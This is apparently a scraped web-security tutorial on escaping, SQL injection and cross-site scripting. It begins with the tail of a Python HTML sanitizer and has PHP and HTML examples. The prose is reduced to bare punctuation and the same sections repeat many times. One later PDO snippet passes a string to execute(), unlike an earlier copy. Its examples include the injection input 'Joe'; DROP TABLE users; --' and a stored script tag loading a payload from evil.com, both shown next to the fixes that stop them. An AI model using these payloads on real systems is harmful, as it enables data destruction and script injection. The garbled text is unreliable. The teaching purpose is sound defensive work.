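    on output, so anything that was not a permitted tag comes back as
    harmless text.
    """

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS and not attrs:     # attributes are never kept
            self.out.append(f"<{tag}>")
            if tag not in VOID_TAGS:
                self.open_tags.append(tag)

    def handle_endtag(self, tag):
        # Only close what we opened, so a stray end tag cannot unbalance the page.
        if self.open_tags and self.open_tags[-1] == tag:
            self.open_tags.pop()
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=True))


def sanitize_html(fragment: str) -> str:
    """Sanitize one user-supplied HTML fragment against ALLOWED_TAGS."""
    p = AllowListSanitizer()
    p.feed(fragment)
    p.close()
    for tag in reversed(p.open_tags):   # close what the author left open
        p.out.append(f"</{tag}>")
    return "".join(p.out)


if __name__ == "__main__":
    print(validate_user_id("42"), validate_user_id("DROP TABLE users"))
    print(sanitize_html('<b onclick="x">bold</b> and <i>x < n</i>'))
```

Sanitizing is the one option of the three that changes the user's data, which is why it is reserved for the case where some markup must be allowed through; where none is needed, escaping on output is simpler and loses nothing.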





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute(array($_POST['name']));





, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).








? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>






, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]





, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp;



", .. : " &amp;&lt;



"





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";





- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";





! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";





... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";





"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'





, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);





, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, : - -! , - ! ! , - , ! !



, . $_POST['name']



- , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'





, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>





, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>





, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>





... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>





, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string



, - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>





htmlspecialchars



, , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>





, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);





, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).








 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
      

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>






, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]





, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp;



", .. : " &amp;&lt;



"





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";





- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";





! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";





... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";





"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'





, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);





, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, : - -! , - ! ! , - , ! !



, . $_POST['name']



- , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'





, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>





, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>





, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>





... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>





, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string



, - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>





htmlspecialchars



, , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>





, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);





, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).








? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>






, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]





, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp;



", .. : " &amp;&lt;



"





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";





- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";





! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";





... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";





"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'





, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);





, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, : - -! , - ! ! , - , ! !



, . $_POST['name']



- , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'





, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>





, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>





, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>





... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>





, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string



, - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>





htmlspecialchars



, , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>





, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);





, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).








 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
      

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>






, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]





, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp;



", .. : " &amp;&lt;



"





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";





- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";





! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";





... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";





"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'





, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);





, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, : - -! , - ! ! , - , ! !



, . $_POST['name']



- , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'





, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>





, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>





, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>





... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>





, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string



, - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>





htmlspecialchars



, , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>





, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);





, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).








? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>






, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]





, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp;



", .. : " &amp;&lt;



"





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";





- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";





! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";





... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";





"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'





, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);





, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, : - -! , - ! ! , - , ! !



, . $_POST['name']



- , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'





, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>





, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>





, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>





... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>





, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string



, - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>





htmlspecialchars



, , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>





, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);





, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).








 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
      

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>






, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]





, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp;



", .. : " &amp;&lt;



"





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";





- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";





! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";





... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";





"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'





, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);





, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, : - -! , - ! ! , - , ! !



, . $_POST['name']



- , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'





, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>





, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>





, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>





... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>





, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string



, - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>





htmlspecialchars



, , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>





, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);





, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).








? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>






, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]





, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp;



", .. : " &amp;&lt;



"





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";





- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";





! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";





... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";





"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'





, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);





, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, : - -! , - ! ! , - , ! !



, . $_POST['name']



- , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'





, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post">
    <p class="meta">
        Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?>
    </p>
    <p class="body">
        <?php echo $post['body']; ?>
    </p>
</div>

, , :

<div class="post">
    <p class="meta">
        Posted by Plato on January 2, 15:31
    </p>
    <p class="body">
        I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat."
    </p>
</div>

, , , , :

<div class="post">
    <p class="meta">
        Posted by Pascal on November 23, 04:12
    </p>
    <p class="body">
        Basic math tells us that if x < n and y > n, x cannot be larger than y.
    </p>
</div>

... . , , , ?



<div class="post">
    <p class="meta">
        Posted by JackTR on July 18, 12:56
    </p>
    <p class="body">
        <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script>
    </p>
</div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

